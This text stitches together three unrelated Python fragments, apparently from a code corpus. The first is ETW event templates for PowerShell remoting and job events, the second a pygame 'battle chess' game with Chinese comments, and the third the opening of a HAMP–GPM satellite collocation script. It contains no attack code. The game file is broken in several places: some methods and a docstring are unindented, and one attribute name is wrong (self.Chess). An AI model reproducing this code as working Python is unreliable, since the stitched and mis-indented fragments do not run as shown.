class Microsoft_Windows_PowerShell_28675_1(Etw):
    pattern = Struct(
        "SerializedType" / WString,
        "OriginalDepth" / Int32sl,
        "OverridenDepth" / Int32sl,
        "CurrentDepthBelowTopLevel" / Int32sl
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28676, version=1)
class Microsoft_Windows_PowerShell_28676_1(Etw):
    pattern = Struct(
        "SerializedType" / WString,
        "OverridenMode" / Int32ul
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28677, version=1)
class Microsoft_Windows_PowerShell_28677_1(Etw):
    pattern = Struct(
        "PropertyName" / WString,
        "PropertyOwnerType" / WString,
        "GetterScript" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28678, version=1)
class Microsoft_Windows_PowerShell_28678_1(Etw):
    pattern = Struct(
        "PropertyName" / WString,
        "PropertyOwnerType" / WString,
        "Exception" / WString,
        "InnerException" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28679, version=1)
class Microsoft_Windows_PowerShell_28679_1(Etw):
    pattern = Struct(
        "TypeBeingEnumerated" / WString,
        "Exception" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28680, version=1)
class Microsoft_Windows_PowerShell_28680_1(Etw):
    pattern = Struct(
        "Type" / WString,
        "Exception" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28682, version=1)
class Microsoft_Windows_PowerShell_28682_1(Etw):
    pattern = Struct(
        "TypeOfObjectAtMaxDepth" / WString,
        "PropertyNameAtMaxDepth" / WString,
        "Depth" / Int32sl
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28683, version=1)
class Microsoft_Windows_PowerShell_28683_1(Etw):
    pattern = Struct(
        "LineNumber" / Int32sl,
        "LinePosition" / Int32sl,
        "Exception" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28684, version=1)
class Microsoft_Windows_PowerShell_28684_1(Etw):
    pattern = Struct(
        "TypeOfObjectWithMissingProperty" / WString,
        "PropertyName" / WString
    )
# Auto-generated ETW event templates for the Microsoft-Windows-PowerShell
# provider: remoting transport / session / fragment events (32769-32868)
# and job / error-record events (45057-45062).  Each `pattern` describes
# the binary user-data layout of one (event_id, version) pair; do not
# edit by hand.
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32769, version=1)
class Microsoft_Windows_PowerShell_32769_1(Etw):
    pattern = Struct(
        "Runspace_InstanceId" / WString,
        "PowerShell_InstanceId" / WString,
        "Destination" / Int32ul,
        "DataType" / Int32ul,
        "TargetInterface" / Int32ul
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32775, version=1)
class Microsoft_Windows_PowerShell_32775_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32776, version=1)
class Microsoft_Windows_PowerShell_32776_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString,
        "ErrorCode" / WString,
        "ErrorMessage" / WString,
        "StackTrace" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32777, version=1)
class Microsoft_Windows_PowerShell_32777_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32784, version=1)
class Microsoft_Windows_PowerShell_32784_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString,
        "ErrorCode" / WString,
        "ErrorMessage" / WString,
        "StackTrace" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32785, version=1)
class Microsoft_Windows_PowerShell_32785_1(Etw):
    pattern = Struct(
        "param1" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32786, version=1)
class Microsoft_Windows_PowerShell_32786_1(Etw):
    pattern = Struct(
        "param1" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32787, version=1)
class Microsoft_Windows_PowerShell_32787_1(Etw):
    pattern = Struct(
        "param1" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32788, version=1)
class Microsoft_Windows_PowerShell_32788_1(Etw):
    pattern = Struct(
        "param1" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32789, version=1)
class Microsoft_Windows_PowerShell_32789_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString,
        "DataSize" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32790, version=1)
class Microsoft_Windows_PowerShell_32790_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32791, version=1)
class Microsoft_Windows_PowerShell_32791_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32792, version=1)
class Microsoft_Windows_PowerShell_32792_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString,
        "DataSize" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32793, version=1)
class Microsoft_Windows_PowerShell_32793_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32800, version=1)
class Microsoft_Windows_PowerShell_32800_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32801, version=1)
class Microsoft_Windows_PowerShell_32801_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32802, version=1)
class Microsoft_Windows_PowerShell_32802_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32803, version=1)
class Microsoft_Windows_PowerShell_32803_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString,
        "SignalCode" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32804, version=1)
class Microsoft_Windows_PowerShell_32804_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "PipelineId" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32805, version=1)
class Microsoft_Windows_PowerShell_32805_1(Etw):
    pattern = Struct(
        "SessionId" / WString,
        "Uri" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32849, version=1)
class Microsoft_Windows_PowerShell_32849_1(Etw):
    pattern = Struct(
        "Runspace_InstanceId" / WString,
        "PowerShell_InstanceId" / WString,
        "DataSize" / WString,
        "DataType" / Int32ul,
        "TargetInterface" / Int32ul
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32850, version=1)
class Microsoft_Windows_PowerShell_32850_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32851, version=1)
class Microsoft_Windows_PowerShell_32851_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32852, version=1)
class Microsoft_Windows_PowerShell_32852_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString,
        "param4" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32853, version=1)
class Microsoft_Windows_PowerShell_32853_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32854, version=1)
class Microsoft_Windows_PowerShell_32854_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32855, version=1)
class Microsoft_Windows_PowerShell_32855_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32856, version=1)
class Microsoft_Windows_PowerShell_32856_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32857, version=1)
class Microsoft_Windows_PowerShell_32857_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32865, version=1)
class Microsoft_Windows_PowerShell_32865_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32866, version=1)
class Microsoft_Windows_PowerShell_32866_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32867, version=1)
class Microsoft_Windows_PowerShell_32867_1(Etw):
    pattern = Struct(
        "ObjectId" / Int64sl,
        "FragmentId" / Int64sl,
        "sFlag" / Int32sl,
        "eFlag" / Int32sl,
        "FragmentLength" / Int32ul,
        "FragmentPayload" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32868, version=1)
class Microsoft_Windows_PowerShell_32868_1(Etw):
    pattern = Struct(
        "ObjectId" / Int64sl,
        "FragmentId" / Int64sl,
        "sFlag" / Int32sl,
        "eFlag" / Int32sl,
        "FragmentLength" / Int32ul,
        "FragmentPayload" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45057, version=1)
class Microsoft_Windows_PowerShell_45057_1(Etw):
    pattern = Struct(
        "Message" / WString,
        "Category" / WString,
        "Reason" / WString,
        "TargetName" / WString,
        "FullyQualifiedErrorId" / WString,
        "ExceptionMessage" / WString,
        "ExceptionStackTrace" / WString,
        "ExceptionInnerException" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45058, version=1)
class Microsoft_Windows_PowerShell_45058_1(Etw):
    pattern = Struct(
        "param1" / WString,
        "param2" / WString,
        "param3" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45060, version=1)
class Microsoft_Windows_PowerShell_45060_1(Etw):
    pattern = Struct(
        "Id" / WString,
        "InstanceId" / WString,
        "Name" / WString,
        "Location" / WString,
        "State" / WString,
        "Command" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45061, version=1)
class Microsoft_Windows_PowerShell_45061_1(Etw):
    pattern = Struct(
        "param1" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45062, version=1)
class Microsoft_Windows_PowerShell_45062_1(Etw):
    pattern = Struct(
        "uri" / WString,
        "shell" / WString,
        "userName" / WString,
        "opentimeout" / WString,
        "idletimeout" / WString,
        "canceltimeout" / WString,
        "auth" / Int32ul,
        "thumbPrint" / WString,
        "redircount" / WString,
        "recvdDataSize" / WString,
        "recvdObjSize" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), | |
<filename>battlechess/game.py
# -*- coding: utf-8 -*-
'''
@name: game
@author: Memory&Xinxin
@date: 2019/11/14
@document: 皇家战棋游戏的主要文件
'''
import time
import pygame
from random import choice
from .base import BaseGame, Button, Chess
from .utils import *
from .configs import *
class BeginGame(BaseGame):
    """Start screen: lets the player choose local play or online matchmaking.

    Parameters
    ----------
    factory : network factory used to exchange data with the server
    user : dict or None
        Current user record; None when no account is available.
    offline : bool
        True when there is no server connection (disables matchmaking).
    """

    def __init__(self, factory, user, offline=False):
        super(BeginGame, self).__init__(WINDOW_TITILE, WINDOW_SIZE)
        pygame.display.set_icon(get_surface('icon'))
        self.factory = factory
        self.user = user
        self.offline = offline
        self.state = 'start'   # 'start' = idle on menu, 'match' = waiting for a match
        self.load_src()
        self.init_buttons()

    def load_src(self):
        """Load the images used by the start screen."""
        self.img_bg = get_surface('bg')
        self.img_trans_bg = get_surface('trans_bg')
        self.img_begin = get_surface('begin')
        self.img_match = surface_clip_by_col(get_surface('match'), 2)
        self.img_button_cancel = surface_clip_by_row(get_surface('button_cancel'), 2)
        self.img_button_mode = surface_clip(get_surface('button_mode'), 2, 2, 'col')

    def init_buttons(self):
        """Create the 'local', 'match' and 'cancel' buttons and their callbacks."""
        def local(button):
            self.begin('local')

        def match(button):
            if not self.lose_connection() and self.user:
                data = {'type': 'match', 'name': self.user['name']}
                self.sendata(data)
                self.state = 'match'
                self.start_wait(self.img_match[0], self.buttons['cancel'])
            else:
                # no connection / no user: show the error wait screen instead
                self.start_wait(self.img_wait[1][3], self.buttons['cancel'])

        def cancel(button):
            if self.state == 'match':
                # tell the server to take us out of the match queue
                data = {'type': 'unmatch', 'name': self.user['name']}
                self.sendata(data)
            button.set_visible(False)
            self.state = 'start'
            self.stop_wait()

        # Fixed typo: this key was previously misspelled 'loacl' (here and in
        # update() below); it is only used inside this class.
        self.buttons['local'] = Button(self.screen, (300, 500), self.img_button_mode[0][0],
                                       'local', self.img_button_mode[0][1], local)
        self.buttons['match'] = Button(self.screen, (555, 500), self.img_button_mode[1][0],
                                       'match', self.img_button_mode[1][1], match)
        # NOTE(review): the cancel button's name argument is 'local', which looks
        # like a copy-paste slip ('cancel' expected) -- left unchanged because the
        # Button name semantics are defined outside this file; confirm before fixing.
        self.buttons['cancel'] = Button(self.screen, (445, 300), self.img_button_cancel[0],
                                        'local', self.img_button_cancel[1], cancel, False)

    def begin(self, mode, data=None):
        """Leave the start screen and launch a BattleChess game in `mode`."""
        uninstall_game()
        game = BattleChess(self.factory, self.user, mode, data)
        self.state = None
        install_game(game)

    def update(self):
        """Per-frame logic: toggle button availability and poll for a match."""
        if self.state == 'start':
            self.buttons['local'].set_click(True)
            if self.offline:
                self.buttons['match'].set_click(False)
            else:
                self.buttons['match'].set_click(True)
        elif self.state == 'match':
            datas = self.get_datas()
            for data in datas:
                if data and data['type'] == 'init':
                    # server found an opponent: start the online game
                    self.begin('online', data)

    def draw(self):
        """Render the start screen and its buttons."""
        self.screen.blit(self.img_bg, (0, 0))
        self.screen.blit(self.img_begin, (0, 0))
        for button in self.buttons.values():
            button.draw()
class BattleChess(BaseGame):
"""战棋的主类"""
    def __init__(self, factory, user, mode, data='None'):
        """Set up a game in `mode` ('local' or 'online').

        `data` is the server-sent game-init packet in online mode; it is
        unused for local games.  (Note the unusual default of the string
        'None' rather than the None singleton -- kept as-is.)
        """
        super(BattleChess, self).__init__(WINDOW_TITILE, WINDOW_SIZE)
        pygame.display.set_icon(get_surface('icon'))  # window icon
        self.factory = factory           # network factory: delivers server data
        self.my_user = user              # current user record
        self.mode = mode                 # game mode: 'local' or 'online'
        self.offline = user is None
        self.init_param()                # initialise per-game state
        self.load_src()                  # load images and fonts
        self.init_game(data)             # set up the board for the chosen mode
        self.init_head()                 # avatar frames
        self.init_button()               # buttons
        self.bind_click(1, self.click)   # bind the left-mouse-button handler
        self.start_time = time.time()    # start the move clock
    @property
    def local(self):
        """True when this is a local (hot-seat) game."""
        return self.mode == 'local'

    @property
    def online(self):
        """True when this is an online game against a remote opponent."""
        return self.mode == 'online'

    @property
    def my_turn(self):
        """True when it is this player's turn to move."""
        return self.turn == self.my_color

    @property
    def enemy_color(self):
        """The opponent's colour: 'blue' when we are 'red', else 'red'."""
        if self.my_color == 'red':
            return 'blue'
        return 'red'
    def init_param(self):
        """Initialise all per-game state."""
        self.start = False                    # whether the game has started
        self.start_time = -1                  # timestamp of the previous action
        self.wait_end = False                 # game over, showing the exit screen
        self.timeout = {'red': 0, 'blue': 0}  # timeout count per side
        self.no_eat = 0                       # moves since the last capture or reveal
        self.step = 0                         # total number of moves so far
        # board-related state
        self.select = (-1, -1)                # selected cell; (-1, -1) means none
        self.last_step = None                 # previous action: position for a reveal, (from, to) for a move
        self.next_list = []                   # cells the selected piece may move to
        self.cb_color = [[None for i in range(ROW)] for j in range(ROW)]  # fill colour of each cell
        self.chess_left = {'red': 18, 'blue': 18, None: 0}  # remaining pieces per side
        self.chess = [[None for i in range(ROW)] for j in range(ROW)]     # all pieces on the board
        # image resources; see the load_src() docstring for the layout
        self.img_unopen = []
        self.img_red_chess = [[[None, None] for i in range(ROW)] for j in range(ROW)]
        self.img_blue_chess = [[[None, None] for i in range(ROW)] for j in range(ROW)]
    def load_src(self):
        """Load image and font resources.

        self.img_unopen holds the face-down piece image in the 6 board sizes.
        self.img_red_chess[i][j][k] is indexed as follows:
            i: 0-5, piece rank: king, general, knight, archer, guard, assassin
            j: 0-5, board row counted from the top (each row uses a different size)
            k: 0 = piece facing left, 1 = piece facing right
        img_blue_chess has the same layout.
        """
        img_unopen = get_surface('unopen')
        img_chess = get_surface('chess')
        self.img_red_head = get_surface('head_red')
        self.img_blue_head = get_surface('head_blue')
        self.img_bg = get_surface('bg')
        self.img_time = get_surface('time')
        self.img_button_ok = surface_clip_by_row(get_surface('button_ok'), 2)
        self.img_button_giveup = surface_clip(get_surface('button_giveup'), 2, 2, 'col')
        for i in range(ROW):
            size = CHESS_SIZE[i]
            self.img_unopen.append(pygame.transform.scale(img_unopen, (size, size)))
            chess_img = pygame.transform.scale(img_chess, (size*6, size*2))
            for j in range(ROW):
                red_temp = chess_img.subsurface((j*size, 0), (size, size))
                blue_temp = chess_img.subsurface((j*size, size), (size, size))
                self.img_red_chess[j][i][0] = red_temp
                self.img_blue_chess[j][i][0] = blue_temp
                self.img_red_chess[j][i][1] = pygame.transform.flip(red_temp, True, False)
                self.img_blue_chess[j][i][1] = pygame.transform.flip(blue_temp, True, False)
        # fonts
        self.font_time = pygame.font.SysFont("Calibri", 40, True)  # remaining-time digits
        self.font_text = pygame.font.SysFont("SimHei", 13, True)   # timeout counter text
        self.font_name = pygame.font.SysFont("SimHei", 14, True)   # player name
        self.font_title = pygame.font.SysFont("SimHei", 18, True)  # player title
    def init_game(self, data):
        """Initialise game parameters for the chosen mode.

        A local game uses a random board layout and a random first player.
        An online game uses the init data sent by the server.
        """
        if self.local:  # local games generate the pieces here; online games get them from the server
            self.load_chess(random_chess())
            if not self.my_user:
                self.my_user = random_user()
            self.your_user = random_user()
            self.turn = choice(['red', 'blue'])
            self.my_color = self.turn
        elif self.online:
            self.load_chess(data['chess'])
            self.your_user = data['you']
            self.turn = data['turn']
            self.my_color = data['color']
def load_chess(self, chess):
'''
载入random_chess()传来的棋子信息,联网对战时,
服务器传来的棋子信息也是random_chess()生成的。
'''
for i, j in self.traverse():
color = chess[i][j][0]
level = chess[i][j][1]
if color == 'red':
self.chess[i][j] = Chess(color, (i, j), level, self.img_red_chess, self.chess)
elif color == 'blue':
self.chess[i][j] = Chess(color, (i, j), level, self.img_blue_chess, self.chess)
    def init_head(self):
        """Initialise the avatar frames.

        The frame template is picked by each side's colour.  Since it never
        changes during a game, the user info is drawn onto it once here.
        copy() is required so the cached template is not modified and can be
        reused by the next game.
        """
        if self.my_color == 'red':
            self.my_head = self.img_red_head.copy()
            self.your_head = self.img_blue_head.copy()
        else:
            self.my_head = self.img_blue_head.copy()
            self.your_head = self.img_red_head.copy()
        self.draw_head(self.my_head, self.my_user)
        self.draw_head(self.your_head, self.your_user)
    def draw_head(self, head, user):
        """Blit the user's title, name and credit score onto an avatar frame."""
        title = self.font_title.render(user['title'], True, COLOR['time_text'])
        name = self.font_name.render(user['name'], True, (255, 255, 255))
        credit = self.font_name.render(str(user['credit']), True, (255, 255, 255))
        rect = head.get_rect()
        # centre the title horizontally; the y offsets match the frame artwork
        pos = title.get_rect(centerx=rect.centerx)
        head.blit(title, (pos.x, 97))
        head.blit(name, (85, 134))
        head.blit(credit, (85, 159))
    def init_button(self):
        """Create the 'ok' and 'giveup' buttons."""
        def ok(button):
            # return to the start screen
            self.end = True
            uninstall_game()
            user = None if self.offline else self.my_user
            begin = BeginGame(self.factory, user, self.offline)
            install_game(begin)
        # Shown only on the final result screen; clicking it ends the game
        # and returns to the start screen.
        self.buttons['ok'] = Button(self.screen, (445, 300), self.img_button_ok[0],
                                    'ok', self.img_button_ok[1], ok)
        # invisible until the game ends
        self.buttons['ok'].set_visible(False)

        def giveup(button):
            if self.online:
                data = {'type': 'giveup'}
                self.sendata(data)
            self.win_game(self.enemy_color)
        # Resign button; only clickable once the game has lasted a minimum
        # number of moves (see MIN_GIVEUP in update()).
        self.buttons['giveup'] = Button(self.screen, (427, 580), self.img_button_giveup[1][0],
                                        'giveup', self.img_button_giveup[1][1], giveup)
        self.buttons['giveup'].set_click(False)
    def win_game(self, color):
        """Enter the end-of-game state.

        `color` is the winning side ('red'/'blue') or None for a draw; the
        matching result screen is selected accordingly.  In online mode the
        player's credit/title are updated and an 'endgame' packet is sent to
        the server.
        """
        self.wait_end = True
        self.buttons['giveup'].set_click(False)
        if self.local:
            mapcolor = {'red': 0, 'blue': 1, None: 2}
            self.img_wait_end = self.img_wait[1][mapcolor[color]]
        elif self.online:
            if not color:
                # draw
                self.img_wait_end = self.img_wait[0][2]
                data = {'type': 'endgame', 'user': None}
            elif color != self.my_color:
                # we lost: deduct credit and recompute the title
                self.img_wait_end = self.img_wait[0][1]
                self.my_user['credit'] -= WIN_CREDIT
                self.my_user['title'] = get_title(self.my_user['credit'])
                data = {'type': 'endgame', 'user': self.my_user}
            elif color == self.my_color:
                # we won: award credit and recompute the title
                self.img_wait_end = self.img_wait[0][0]
                self.my_user['credit'] += WIN_CREDIT
                self.my_user['title'] = get_title(self.my_user['credit'])
                data = {'type': 'endgame', 'user': self.my_user}
            # NOTE(review): sendata must stay inside the online branch --
            # `data` is never bound in local mode.
            self.sendata(data)
        self.start_wait(self.img_wait_end, self.buttons['ok'])
def update(self):
'''
判断是否游戏结束,并且解析服务器传来的数据。
'''
if self.wait_end:
return
if self.online and self.lose_connection():
self.wait_end = True
self.offline = True
self.start_wait(self.img_wait[0][3], self.buttons['ok'])
return
redleft, blueleft = self.chess_left['red'], self.chess_left['blue']
redtime, bluetime = self.timeout['red'], self.timeout['blue']
# 检测是否有一方棋子全被吃掉
if redleft == 0:
self.win_game('blue')
elif blueleft == 0:
self.win_game('red')
# 检测双方是否都只剩下一个棋子,若是,谁的比较大谁就获胜
elif redleft == 1 and blueleft == 1:
left = {}
for i, j in self.traverse():
chess = self.Chess[i][j]
if chess:
left[chess.color] = chess
if left['red'].eat(left['blue']):
self.win_game('red')
else:
self.win_game('blue')
# 谁超时了 MAX_TIMEOUT 次就算输
if redtime >= MAX_TIMEOUT:
self.win_game('blue')
elif bluetime >= MAX_TIMEOUT:
self.win_game('red')
# MAX_NOEAT 步内没有吃子或者翻开棋子就自动和棋
if self.no_eat >= MAX_NOEAT:
self.win_game(None)
# 至少 MIN_GIVEUP 步以后才能认输
if self.step >= MIN_GIVEUP:
self.buttons['giveup'].set_click(True)
self.parse_data()
    def parse_data(self):
        """Apply 'move'/'open'/'giveup' packets received from the server."""
        if not self.factory or not self.factory.data or self.wait_end:
            return
        # TODO: add disconnect detection.
        if self.factory.lost:
            pass
        datas = self.get_datas()
        for data in datas:
            typ = data['type']
            if typ == 'move':
                # opponent moved a piece from `from` to `to`
                x, y = data['from'][0], data['from'][1]
                self.move_chess(self.chess[x][y], *data['to'])
            elif typ == 'open':
                # opponent revealed a face-down piece
                x, y = data['from'][0], data['from'][1]
                self.open_chess(x, y)
            elif typ == 'giveup':
                # opponent resigned: we win
                self.win_game(self.my_color)
    def update_color(self):
        """Recompute the fill colour of every board cell.

        Priority (later overrides earlier): checkerboard base colour,
        last-move highlight, reachable-cell highlight, then the selected
        cell or the cell under the mouse cursor.
        """
        if self.wait_end:
            return
        for i, j in self.traverse():
            p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
            if (i+j) % 2 == 0:
                self.cb_color[i][j] = COLOR['board_1']
            else:
                self.cb_color[i][j] = COLOR['board_2']
            if self.last_step == (i, j):
                self.cb_color[i][j] = COLOR['last_step']
            if (i, j) in self.next_list:
                self.cb_color[i][j] = COLOR['next']
            # cell holding the currently selected piece
            x, y = pygame.mouse.get_pos()
            if self.select == (i, j):
                self.cb_color[i][j] = COLOR['select']
            # cell currently under the mouse cursor
            elif isInsidePolygon((x, y), p):
                self.cb_color[i][j] = COLOR['hover']
    def draw_time(self):
        """Draw the remaining move time and timeout counter for the side to move."""
        if self.wait_end:
            return
        time_img = self.img_time.copy()
        t = int(time.time() - self.start_time)
        if t > MAX_TIME:
            # the side to move ran out of time: restart the clock and count it
            self.start_time = time.time()
            t = 0
            self.timeout[self.turn] += 1
            print(self.timeout)
        # 'red'/'blue' double as pygame colour names for the countdown digits
        time_left = self.font_time.render(str(MAX_TIME-t), True, pygame.color.Color(self.turn))
        rect = time_img.get_rect()
        pos = time_left.get_rect(centerx=rect.centerx, bottom=rect.bottom-20)
        time_img.blit(time_left, pos)
        if self.local:
            text = '你已超时 %d 次' % self.timeout[self.turn]
            time_pos = TIME_POS[0] if self.turn == 'red' else TIME_POS[1]
        elif self.my_color == self.turn:
            text = '你已超时 %d 次' % self.timeout[self.turn]
            time_pos = TIME_POS[0]
        else:
            text = '对方已超时 %d 次' % self.timeout[self.turn]
            time_pos = TIME_POS[1]
        time_text = self.font_text.render(text, True, COLOR['time_text'])
        pos = time_text.get_rect(centerx=rect.centerx, top=rect.top+20)
        time_img.blit(time_text, pos)
        self.screen.blit(time_img, time_pos)
    def draw(self):
        """Render one frame of the game."""
        # background and per-cell colours
        self.update_color()
        self.screen.blit(self.img_bg, (0, 0))
        # board border
        pygame.draw.polygon(self.screen, COLOR['boder'], BODER)
        # avatar frames
        self.screen.blit(self.my_head, (20, 50))
        self.screen.blit(self.your_head, (780, 50))
        # remaining time
        self.draw_time()
        for i, j in self.traverse():
            # board cell
            p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
            pygame.draw.polygon(self.screen, self.cb_color[i][j], p)
            # piece on the cell (if any)
            chess = self.chess[i][j]
            if chess is None:
                continue
            if not chess.open:
                # face-down pieces use the size-matched back image
                self.screen.blit(self.img_unopen[i], CHESS_POS[i][j])
            else:
                chess.draw(self.screen)
        self.buttons['giveup'].draw()
def traverse(self):
'''
遍历整个棋盘,返回每个位置(i, j)
'''
for i in range(ROW):
for j in range(ROW):
yield i, j
def find_position(self, x, y):
'''
找到位置 (x, y) 属于哪一个棋盘格。
@(x, y): 像素位置。
@return:棋盘位置(i, j)
'''
for i, j in self.traverse():
p = [CHESSBOARD[i][j], CHESSBOARD[i+1][j], CHESSBOARD[i+1][j+1], CHESSBOARD[i][j+1]]
| |
<gh_stars>0
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import xarray
import datetime
import glob
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.spatial
import matplotlib as mpl
import matplotlib.ticker
import os
import abc
import cartopy.crs as ccrs
import geopy.distance
# Import some support utilities to help with the plots
from AbsoluteGrid import get_HAMP_label, AbsoluteGrid, center_to_edge
"""Investigate HAMP - GPM collocations
This script provides methods for a point-to-point comparison of HAMP
and GPM measurements and products.
This script is just a starting point. It provides functions to handle
the GPM data a bit easier.
The GPM data comes in a lot of different processing levels:
https://gpm.nasa.gov/data/directory
The files are in hdf5 format and use the Group feature a lot. However,
no verbose dimensions are used. To handle these inconvenient features,
helper functions like rename_phony_dims() and several open_*() functions
were written. Those functions try to provide a useful xarray interface to
